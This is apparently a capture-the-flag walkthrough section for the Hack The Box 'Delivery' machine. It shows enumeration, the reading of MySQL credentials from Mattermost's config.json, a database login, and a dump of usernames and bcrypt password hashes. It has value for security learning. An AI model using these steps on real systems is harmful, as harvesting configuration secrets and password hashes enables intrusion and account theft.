Enumeration

maildeliverer@Delivery:/var/www/osticket/scripts$ netstat
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 localhost:35220         localhost:mysql         ESTABLISHED
tcp        0      0 localhost:mysql         localhost:35222         ESTABLISHED
tcp        0      0 localhost:mysql         localhost:35226         ESTABLISHED
tcp        0      0 localhost:35222         localhost:mysql         ESTABLISHED
tcp        0      0 localhost:35228         localhost:mysql         ESTABLISHED
tcp        0      0 localhost:35224         localhost:mysql         ESTABLISHED
tcp        0      0 localhost:mysql         localhost:35218         ESTABLISHED
tcp        0      0 localhost:35216         localhost:mysql         ESTABLISHED
tcp        0      0 localhost:mysql         localhost:35220         ESTABLISHED
tcp        0      0 localhost:mysql         localhost:35224         ESTABLISHED
tcp        0      0 localhost:35226         localhost:mysql         ESTABLISHED
tcp        0      0 localhost:mysql         localhost:35228         ESTABLISHED
tcp        0      0 localhost:mysql         localhost:35216         ESTABLISHED

MySQL is running.

Remember the agent login page: http://helpdesk.delivery.htb/scp/login.php

So this page seems interesting (we know its running nginx and this is the root directory):

maildeliverer@Delivery:/var/www/osticket/upload/scp$ ls
admin.inc.php  apps          canned.php      departments.php    emailtest.php  forms.php       js         logo.php    pages.php    queues.php     slas.php       tasks.php      upgrade.php
admin.php      audits.php    categories.php  directory.php      export.php     helptopics.php  kb.php     logout.php  plugins.php  roles.php      staff.inc.php  teams.php      users.php
ajax.php       autocron.php  css             emailsettings.php  faq.php        images          lists.php  logs.php    profile.php  schedules.php  staff.php      templates.php
apikeys.php    banlist.php   dashboard.php   emails.php         filters.php    index.php       login.php  orgs.php    pwreset.php  settings.php   system.php     tickets.php

Couldnt find anything interesting here.

Checking Mattermost apps directory, the default is /opt/mattermost according to the docs.

Inside /opt/mattermost/config/config.json file we find MySQL credentials:

"SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],
        "MaxIdleConns": 20,
        "ConnMaxLifetimeMilliseconds": 3600000,
        "MaxOpenConns": 300,
        "Trace": false,
        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
        "QueryTimeout": 30,
        "DisableDatabaseSearch": false
    },

We can log into mysql:

mysql -u mmuser -pCrack_The_MM_Admin_PW

MariaDB [(none)]> select @@Version
    -> ;
+---------------------------+
| @@Version                 |
+---------------------------+
| 10.3.27-MariaDB-0+deb10u1 |
+---------------------------+
1 row in set (0.000 sec)

show databases;
use mattermost

show tables;

describe Users;

This will give us the Users table where we find columns 'username' and 'password'

MariaDB [mattermost]> select Username,Password from Users;
+----------------------------------+--------------------------------------------------------------+
| Username                         | Password                                                     |
+----------------------------------+--------------------------------------------------------------+
| surveybot                        |                                                              |
| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
| haxor                            | $2a$10$2aOqeHBn8NXYS33Q4r2hGuUcGOZllnkegycHbWunFJK/SyP9bRqIG |
| root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
| channelexport                    |                                                              |
| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
+----------------------------------+--------------------------------------------------------------+
8 rows in set (0.000 sec)

PreviousFoothold NextPrivEsc

Last updated 10 months ago